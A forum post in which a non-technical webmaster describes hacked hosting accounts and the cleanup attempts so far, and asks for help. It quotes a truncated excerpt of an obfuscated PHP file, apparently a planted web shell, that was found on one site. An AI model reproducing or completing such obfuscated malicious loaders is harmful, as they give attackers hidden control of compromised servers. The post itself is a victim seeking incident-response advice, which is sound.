joined:Sept 23, 2012
First of all my apologies if posted in wrong section, I didn't see a security/recovery section.
Premise: I am not a coder, or network guy, nevertheless I "manage" about 15 sites (friends, non-profit, and a couple of mine)
For convenience instead of single accounts, I got a reseller account from a host (which is not very helpful in this case).
As per the subject the sites have been hacked.
From googling and reading I gathered I have to see access logs to understand where they got in from.
As you can guess I am not able to do this, I mean I think I get what each field is about, but how to use it is all another story.
I read thru this site, but the more I read the more I get confused ...
Apparently the hack affected only the home index page, the first round only the php ones, and after 3 days***, also one that had an html one.
I downloaded the sites, and compared with original files on local, and they are fine (save the home index ones).
So I reloaded the original index files on three of them, and deleted, and replaced with a place holder index.html on the others, I monitored the three sites, for a couple days, and they seemd fine, save that ***the immune html homepage showed the hack page.
At this point I deleted as many accounts, as I could, and left only 6 up, and renamed public_html, and created new ones for the remaining; recreated a couple, and am reloading the scripts, but I saw the favicon.ico appear again (not on the two newly recreated accounts though), host says they are created with the new public_html, but it doesn't happen within a few seconds from my view; I used on online file scanner, and says the file is clean.
On one of the sites (one of deleted/recreated accounts) there were a couple more files, and a couple of folders that obviously were not part of the site; one of the files is a php (120KB), which does seem to be one of the components, here is an excerpt (start, mid, end):
<?php /* Cod3d by Mr.Alsa3ek and Al-Swisre */$OOO000000=urldecode('%66%67%36%73%62% [... cut by me ...] E8wKTs='));return;?>~Dkr9NHe [... cut by me ...] 4YtI0hNt9Pfo1SNI0hkzS=alVnRPIq
Also on the main account there was a 1.3GB file with permissions set 000, I changed it, and deleted it.
Now by apologizing for the long post I ask for your advise, suggestions, and help.